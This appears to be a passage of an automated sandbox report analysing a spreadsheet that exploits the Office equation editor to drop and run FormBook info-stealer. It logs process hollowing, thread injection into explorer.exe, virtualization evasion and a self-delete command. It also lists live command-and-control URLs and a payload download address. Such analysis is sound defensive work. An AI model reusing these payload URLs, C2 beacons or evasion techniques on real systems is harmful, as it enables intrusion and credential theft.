Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.507848304.00000000004C9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_730591B5 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B822 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B82B push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B88C push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181F3 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004153B2 push 36635107h; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7D5 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075DFA1 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004181F3 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_004153B2 push 36635107h; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B7D5 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B822 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B82B push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B88C push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022FDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009C076 push ss; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_000981F3 push es; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_000953B2 push 36635107h; retf
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009C546 push cs; iretd
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009B7D5 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009B82B push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009B822 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0009B88C push eax; ret

Source: vbc.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4c259
Source: xggenq.dll.4.dr	Static PE information: real checksum: 0x1f5f8 should be: 0x23b20
Source: vbc[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4c259

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2596	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2736	Thread sleep time: -34000s >= -30000s

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Last function: Thread delayed

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088D0 rdtsc

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,

Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.489929362.000000000456F000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.545549121.000000000449C000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.473795632.00000000004F4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.498055259.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.484915652.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73057B03 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73055990 ksurfviwic,GetProcessHeap,RtlAllocateHeap,VirtualProtect,

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088D0 rdtsc

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73066616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_730666C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007626F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022E0080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_022E00EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_023026F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B40 LdrLoadDll,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73058D72 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.spacex-live.net
Source: C:\Windows\explorer.exe	Domain query: www.schittstore.com
Source: C:\Windows\explorer.exe	Domain query: www.metanetgateway.com
Source: C:\Windows\explorer.exe	Network Connect: 66.29.132.90 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.75.173 80
Source: C:\Windows\explorer.exe	Network Connect: 75.2.60.5 80
Source: C:\Windows\explorer.exe	Network Connect: 162.241.253.231 80
Source: C:\Windows\explorer.exe	Domain query: www.sarahannsartstudio.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D30000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 1764

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.478045052.0000000000750000.00000002.00020000.sdmp, NETSTAT.EXE, 00000007.00000002.666570815.0000000000D40000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery151	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection612	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Network Connections Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery14	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO5594.xlsx	32%	Virustotal		Browse
PO5594.xlsx	30%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.vbc.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.NETSTAT.EXE.4119a0.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.0.vbc.exe.400000.4.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
5.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
5.0.vbc.exe.400000.1.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
5.0.vbc.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
5.0.vbc.exe.400000.3.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
5.0.vbc.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.vbc.exe.2f90000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.NETSTAT.EXE.27e796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.0.vbc.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.vbc.exe.400000.2.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
5.1.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sarahannsartstudio.com	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0	0%	Avira URL Cloud	safe
https://www.metanetgateway.com/ddzw/	0%	Avira URL Cloud	safe
www.passionfruitny.com/ddzw/	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0	0%	Avira URL Cloud	safe
http://treyresearch.net	0%	URL Reputation	safe
https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0J	0%	Avira URL Cloud	safe
http://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0	0%	Avira URL Cloud	safe
http://java.sun.com	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://103.232.53.25/8880/vbc.exe	0%	Avira URL Cloud	safe
http://www.sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.spacex-live.net	104.21.75.173	true	true		unknown
www.metanetgateway.com	75.2.60.5	true	true		unknown
sarahannsartstudio.com	162.241.253.231	true	true	3%, Virustotal, Browse	unknown
schittstore.com	66.29.132.90	true	true		unknown
www.sarahannsartstudio.com	unknown	unknown	true		unknown
www.schittstore.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0	true	Avira URL Cloud: safe	unknown
www.passionfruitny.com/ddzw/	true	Avira URL Cloud: safe	low
http://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0	true	Avira URL Cloud: safe	unknown
http://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0	true	Avira URL Cloud: safe	unknown
http://103.232.53.25/8880/vbc.exe	true	Avira URL Cloud: safe	unknown
http://www.sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerp	explorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com0	explorer.exe, 00000006.00000000.546883814.0000000007329000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.metanetgateway.com/ddzw/	NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
